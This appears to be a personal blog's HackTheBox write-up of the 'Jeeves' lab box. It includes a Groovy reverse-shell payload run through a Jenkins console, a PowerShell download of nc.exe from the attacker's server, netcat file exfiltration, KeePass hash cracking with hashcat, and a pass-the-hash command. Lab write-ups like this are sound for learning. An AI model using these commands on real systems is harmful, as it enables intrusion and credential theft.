s          ..                                 
    :8    < .z@8"`        ..                       
   .88     !@88E         @L             u.    u.   
  :888ooo  '888E   u    9888i   .dL   x@88k u@88c. 
-*8888888   888E u@8NL  `Y888k:*888. ^"8888""8888" 
  8888      888E`"88*"    888E  888I   8888  888R  
  8888      888E .dN.     888E  888I   8888  888R  
  8888      888E~8888     888E  888I   8888  888R  
 .8888Lu=   888E '888&    888E  888I   8888  888R  
 ^%888*     888E  9888.  x888N><888'  "*88*" 8888" 
   'Y"    '"888*" 4888"   "88"  888     ""   'Y"   
             ""    ""           88F                
                               98"                 
                             ./"                   
                            ~`
Musings from a mediocre hacker

Jeeves-HackTheBox

Jeeves is in reference to a Jenkins server that we will eventually be exploiting. Super fun recap box!


Starting off by scanning ports.

See there is at least one webserver. Fuzz directories, ran nikto etc. Nothing of real interest there.
Check out the second Jetty webserver spotted in the nmap scan. gobuster until we find askjeeves

Stumble accross the scripting console

Do research to find ways to exploit this
exploit jenkins with groovy script
https://book.hacktricks.xyz/pentesting/pentesting-web/jenkins#code-execution

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#groovy

String host=”“;
int port=1234;
String cmd=”cmd.exe”;
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

We get a user shell as kohsuke.
After a little bit of recon we come accross CEH.kdbx

This file format appears to be a keepass password file. Before we attempt to see the password we have to download the file to our local machine.

I achieved this by downloading a netcat executable from the user shell we are in from a python http server that we host.

“powershell wget “http://localip:8000/nc.exe“ -outfile nc.exe”
The virtual machine cannot reach out to github to download the file from there
Then “nc -lnvp > CEH.kdbx” on your local machine and “nc.exe < “CEH.kdbx” on the victim machine

We need a password to open the kdbx file. Why dont we crack it?
I used this article as guidance, the main points summarized are

https://www.rubydevices.com.au/blog/how-to-hack-keepass
download and use keepass2john on the kdbx file.

./keepass2john CEH.kdbx > CEH.hash
Remove name of keepass database from the new hashfile.
use hashcat to crack the file.

./hashcat -m 13400 -a 0 -w 1 CEH.hash
moonshine1 is the password to the keepass file

We find a hash in the keepass file under the title of Backup stuff
From here I got stuck for a while. While researching I found the tool pth-winexe
read the docs, run to get admin!

pth-winexe –user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 –system //10.10.10.63 cmd.ex

we now have a root shell!

admin has hm.txt file redirecting to actual file

get-content .\hm.txt -stream root.txt
and we get root flag :)